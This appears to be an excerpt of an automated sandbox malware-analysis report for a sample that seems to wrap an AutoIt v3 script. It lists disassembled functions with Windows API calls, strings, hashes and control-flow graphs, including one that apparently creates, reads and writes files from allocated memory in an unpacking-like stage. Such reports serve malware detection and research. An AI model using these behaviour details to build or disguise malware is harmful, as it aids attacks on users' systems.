                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: e6a3179edb96b87dd238366dcd58b381c2d22822b62882a4d3f9acd304507856
                                    • Instruction ID: 00ce502743c5cf7ab4de47cfafd70b48a73e5445eb330c8a37617f9d4f12e3d3
                                    • Opcode Fuzzy Hash: e6a3179edb96b87dd238366dcd58b381c2d22822b62882a4d3f9acd304507856
                                    • Instruction Fuzzy Hash: 9DE092318108115782146738AC094A9366CDB15339B104755F475C11D0E76099844595
                                    Function 00143B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID: @
                                    • API String ID: 3728558374-2766056989
                                    • Opcode ID: 76c52b43d0e90b910ec0365b8e7140fbd743a321e1024d3088871086e76cd695
                                    • Instruction ID: 7921b041542a7c1936d0a63ade410aaf4724e17329ab9844ed8f1fad1bf3347e
                                    • Opcode Fuzzy Hash: 76c52b43d0e90b910ec0365b8e7140fbd743a321e1024d3088871086e76cd695
                                    • Instruction Fuzzy Hash: F272BC74E04208AFCF14DF94C881ABEB7B5FF59300F25805AF919AB2A1D771AE45CB91
                                    Function 0013E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013E959
                                    • timeGetTime.WINMM ref: 0013EBFA
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013ED2E
                                    • TranslateMessage.USER32(?), ref: 0013ED3F
                                    • DispatchMessageW.USER32(?), ref: 0013ED4A
                                    • LockWindowUpdate.USER32(00000000), ref: 0013ED79
                                    • DestroyWindow.USER32 ref: 0013ED85
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013ED9F
                                    • Sleep.KERNEL32(0000000A), ref: 001A5270
                                    • TranslateMessage.USER32(?), ref: 001A59F7
                                    • DispatchMessageW.USER32(?), ref: 001A5A05
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001A5A19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 2641332412-570651680
                                    • Opcode ID: 4f4b6e16a51c0624c247683b9c7ee4b559cd63c14250c74fdd50840826e228f5
                                    • Instruction ID: 6a1165667c1d42540f134a1aa42c09bd9d6599cfcf3a2da9a24ab0c3839342c1
                                    • Opcode Fuzzy Hash: 4f4b6e16a51c0624c247683b9c7ee4b559cd63c14250c74fdd50840826e228f5
                                    • Instruction Fuzzy Hash: 7962D270508340DFDB25DF24C885BAAB7E5BF55304F04496DF98A8B2D2DB74D888CB62
                                    Function 00165C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___createFile.LIBCMT ref: 00165EC3
                                    • ___createFile.LIBCMT ref: 00165F04
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00165F2D
                                    • __dosmaperr.LIBCMT ref: 00165F34
                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00165F47
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00165F6A
                                    • __dosmaperr.LIBCMT ref: 00165F73
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00165F7C
                                    • __set_osfhnd.LIBCMT ref: 00165FAC
                                    • __lseeki64_nolock.LIBCMT ref: 00166016
                                    • __close_nolock.LIBCMT ref: 0016603C
                                    • __chsize_nolock.LIBCMT ref: 0016606C
                                    • __lseeki64_nolock.LIBCMT ref: 0016607E
                                    • __lseeki64_nolock.LIBCMT ref: 00166176
                                    • __lseeki64_nolock.LIBCMT ref: 0016618B
                                    • __close_nolock.LIBCMT ref: 001661EB
                                      • Part of subcall function 0015EA9C: CloseHandle.KERNELBASE(00000000,001DEEF4,00000000,?,00166041,001DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015EAEC
                                      • Part of subcall function 0015EA9C: GetLastError.KERNEL32(?,00166041,001DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015EAF6
                                      • Part of subcall function 0015EA9C: __free_osfhnd.LIBCMT ref: 0015EB03
                                      • Part of subcall function 0015EA9C: __dosmaperr.LIBCMT ref: 0015EB25
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __lseeki64_nolock.LIBCMT ref: 0016620D
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00166342
                                    • ___createFile.LIBCMT ref: 00166361
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0016636E
                                    • __dosmaperr.LIBCMT ref: 00166375
                                    • __free_osfhnd.LIBCMT ref: 00166395
                                    • __invoke_watson.LIBCMT ref: 001663C3
                                    • __wsopen_helper.LIBCMT ref: 001663DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                    • String ID: @
                                    • API String ID: 3896587723-2766056989
                                    • Opcode ID: a01f81c7f4add6e8f006970f2e10bcd0baa2b592827dfaeed8212fc6da5ce757
                                    • Instruction ID: dfc35322c28eff2f3c4fb598bc056d9299aac2e1c563d78bc6472bbe3c37a5f8
                                    • Opcode Fuzzy Hash: a01f81c7f4add6e8f006970f2e10bcd0baa2b592827dfaeed8212fc6da5ce757
                                    • Instruction Fuzzy Hash: BB22457190060A9FEF299F68DC56BBD7B72FF15324F244229E8219B2E2C7358D60C791
                                    Function 0015EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 4aaa802a38cf686a801122e5d7558e70716f2d9bcf00c76174fc013859e00264
                                    • Instruction ID: deec594c3ce7456f9d2658a1bc933709b58034b4c042add320cba354910bcc4c
                                    • Opcode Fuzzy Hash: 4aaa802a38cf686a801122e5d7558e70716f2d9bcf00c76174fc013859e00264
                                    • Instruction Fuzzy Hash: 12324374A04241CFDB258F68D880BBD7BB1BF56315F29806EECB59F292D770984AC760
                                    Function 0017FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • _wcscpy.LIBCMT ref: 0017FA96
                                    • _wcschr.LIBCMT ref: 0017FAA4
                                    • _wcscpy.LIBCMT ref: 0017FABB
                                    • _wcscat.LIBCMT ref: 0017FACA
                                    • _wcscat.LIBCMT ref: 0017FAE8
                                    • _wcscpy.LIBCMT ref: 0017FB09
                                    • __wsplitpath.LIBCMT ref: 0017FBE6
                                    • _wcscpy.LIBCMT ref: 0017FC0B
                                    • _wcscpy.LIBCMT ref: 0017FC1D
                                    • _wcscpy.LIBCMT ref: 0017FC32
                                    • _wcscat.LIBCMT ref: 0017FC47
                                    • _wcscat.LIBCMT ref: 0017FC59
                                    • _wcscat.LIBCMT ref: 0017FC6E
                                      • Part of subcall function 0017BFA4: _wcscmp.LIBCMT ref: 0017C03E
                                      • Part of subcall function 0017BFA4: __wsplitpath.LIBCMT ref: 0017C083
                                      • Part of subcall function 0017BFA4: _wcscpy.LIBCMT ref: 0017C096
                                      • Part of subcall function 0017BFA4: _wcscat.LIBCMT ref: 0017C0A9
                                      • Part of subcall function 0017BFA4: __wsplitpath.LIBCMT ref: 0017C0CE
                                      • Part of subcall function 0017BFA4: _wcscat.LIBCMT ref: 0017C0E4
                                      • Part of subcall function 0017BFA4: _wcscat.LIBCMT ref: 0017C0F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                    • String ID: >>>AUTOIT SCRIPT<<<
                                    • API String ID: 2955681530-2806939583
                                    • Opcode ID: e460276c4d1a1e7f6cae9148001693eb456ca6e1a1d82cacabb5c5725cbb9a37
                                    • Instruction ID: d4e0bba1cba1e9fa7c3faddb3392f098f5e4353e3d9b9be6041febf6ae05c9f7
                                    • Opcode Fuzzy Hash: e460276c4d1a1e7f6cae9148001693eb456ca6e1a1d82cacabb5c5725cbb9a37
                                    • Instruction Fuzzy Hash: 999183715046059FDB21EB94C891F9FB3F8BFA8310F04886DF9599B291DB30EA49CB91
                                    Function 0017BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0017BDB4: __time64.LIBCMT ref: 0017BDBE
                                      • Part of subcall function 00134517: _fseek.LIBCMT ref: 0013452F
                                    • __wsplitpath.LIBCMT ref: 0017C083
                                      • Part of subcall function 00151DFC: __wsplitpath_helper.LIBCMT ref: 00151E3C
                                    • _wcscpy.LIBCMT ref: 0017C096
                                    • _wcscat.LIBCMT ref: 0017C0A9
                                    • __wsplitpath.LIBCMT ref: 0017C0CE
                                    • _wcscat.LIBCMT ref: 0017C0E4
                                    • _wcscat.LIBCMT ref: 0017C0F7
                                    • _wcscmp.LIBCMT ref: 0017C03E
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C65D
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C670
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0017C2A1
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0017C338
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0017C34E
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0017C35F
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0017C371
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                    • String ID: p1Wu`KXu
                                    • API String ID: 2378138488-4063981602
                                    • Opcode ID: 429fb969c3d5163fdad87c8fb430192347bf1188241324635a16caf39649e221
                                    • Instruction ID: 3f5609535e8ca36e4ff704131e85d442eae4da9e95762b4de6ce4f8b75a29e07
                                    • Opcode Fuzzy Hash: 429fb969c3d5163fdad87c8fb430192347bf1188241324635a16caf39649e221
                                    • Instruction Fuzzy Hash: 9FC11BB1A00219AFDF25DF95CC81EDEB7BDAF59310F0080AAF619E6151DB709A848F61
                                    Function 00133E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00133E79
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00133E88
                                    • LoadIconW.USER32(00000063), ref: 00133E9E
                                    • LoadIconW.USER32(000000A4), ref: 00133EB0
                                    • LoadIconW.USER32(000000A2), ref: 00133EC2
                                      • Part of subcall function 00134024: LoadImageW.USER32(00130000,00000063,00000001,00000010,00000010,00000000), ref: 00134048
                                    • RegisterClassExW.USER32(?), ref: 00133F30
                                      • Part of subcall function 00133F53: GetSysColorBrush.USER32(0000000F), ref: 00133F86
                                      • Part of subcall function 00133F53: RegisterClassExW.USER32(00000030), ref: 00133FB0
                                      • Part of subcall function 00133F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00133FC1
                                      • Part of subcall function 00133F53: LoadIconW.USER32(000000A9), ref: 00134004
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2880975755-4155596026
                                    • Opcode ID: 01978dc6ff7f8b9887aa5ed5c4f0607bf4ed86b5cc7048fd4cdfb43e6efe37fc
                                    • Instruction ID: 0200a5842699be817e70d583e10959c2f6bb37db2aca27f6054d9a548df86965
                                    • Opcode Fuzzy Hash: 01978dc6ff7f8b9887aa5ed5c4f0607bf4ed86b5cc7048fd4cdfb43e6efe37fc
                                    • Instruction Fuzzy Hash: 81213CB4D04304FBDB04DFAAEC49AA9BBF9FB48314F14422AE214A36A0D7754680CF95
                                    Function 00133F53 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00133F86
                                    • RegisterClassExW.USER32(00000030), ref: 00133FB0
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00133FC1
                                    • LoadIconW.USER32(000000A9), ref: 00134004
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: 8ba895fcd22921142b1c02a9f1ce86ac6ad94e795aa8e0e2d0b43174e9fdbce2
                                    • Instruction ID: 9761ba58c768e622d0127b5b77681c4596599559fd35a69bed1ad5b2f6d78cee
                                    • Opcode Fuzzy Hash: 8ba895fcd22921142b1c02a9f1ce86ac6ad94e795aa8e0e2d0b43174e9fdbce2
                                    • Instruction Fuzzy Hash: EB21C4B5900318EFDB00DFA5E889BDDBBB4FB08714F00421AFA11E66A0EBB54584CF91
                                    Function 0177B830 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1296 177b830-177b882 call 177b730 CreateFileW 1299 177b884-177b886 1296->1299 1300 177b88b-177b898 1296->1300 1301 177b9e4-177b9e8 1299->1301 1303 177b8ab-177b8c2 VirtualAlloc 1300->1303 1304 177b89a-177b8a6 1300->1304 1305 177b8c4-177b8c6 1303->1305 1306 177b8cb-177b8f1 CreateFileW 1303->1306 1304->1301 1305->1301 1307 177b915-177b92f ReadFile 1306->1307 1308 177b8f3-177b910 1306->1308 1310 177b953-177b957 1307->1310 1311 177b931-177b94e 1307->1311 1308->1301 1313 177b959-177b976 1310->1313 1314 177b978-177b98f WriteFile 1310->1314 1311->1301 1313->1301 1315 177b991-177b9b8 1314->1315 1316 177b9ba-177b9df CloseHandle VirtualFree 1314->1316 1315->1301 1316->1301
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0177B875
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction ID: 7255bbec1e28517f8ed0033bb97f8351c1a905fa54d47537346f7494f5b5cabc
                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction Fuzzy Hash: CE51D975A50208FBEF24DFB4CC49FEEB778AF48701F108554F65AEB280DA749A458B60
                                    Function 001349FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1326 1349fb-134a25 call 13bcce RegOpenKeyExW 1329 1a41cc-1a41e3 RegQueryValueExW 1326->1329 1330 134a2b-134a2f 1326->1330 1331 1a4246-1a424f RegCloseKey 1329->1331 1332 1a41e5-1a4222 call 14f4ea call 1347b7 RegQueryValueExW 1329->1332 1337 1a423d-1a4245 call 1347e2 1332->1337 1338 1a4224-1a423b call 136a63 1332->1338 1337->1331 1338->1337
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00134A1D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001A41DB
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001A421A
                                    • RegCloseKey.ADVAPI32(?), ref: 001A4249
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                    • API String ID: 1586453840-614718249
                                    • Opcode ID: 4409f42800b9768a2f78b61dd15fd041f51ce5457f91d52b50e9f9ffa50f2d93
                                    • Instruction ID: 6b3c493a6b3ea2bd7973c78a1c383465d2efbf04204763eec3f3f13f25bca75a
                                    • Opcode Fuzzy Hash: 4409f42800b9768a2f78b61dd15fd041f51ce5457f91d52b50e9f9ffa50f2d93
                                    • Instruction Fuzzy Hash: 6F113A75A00109BFEB14ABA4DD86EBF7BBCEF15354F004069B506E6191EB70AE429B50
                                    Function 001336B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1353 1336b8-133728 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001336E6
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133707
                                    • ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 0013371B
                                    • ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 00133724
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: afc8f46f014f9df4563ee26781ef740fc753ae07a35dcdff797655434e81aca6
                                    • Instruction ID: a1eb234c809c6407b9716ecd1c5377cc21461fba628d3ab36828fcca42203989
                                    • Opcode Fuzzy Hash: afc8f46f014f9df4563ee26781ef740fc753ae07a35dcdff797655434e81aca6
                                    • Instruction Fuzzy Hash: B1F0DA755402D0BAE7315B57AC08E773E7DE7C6F24B00012EBA04A25A0DA6148D5DBB0
                                    Function 001351AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
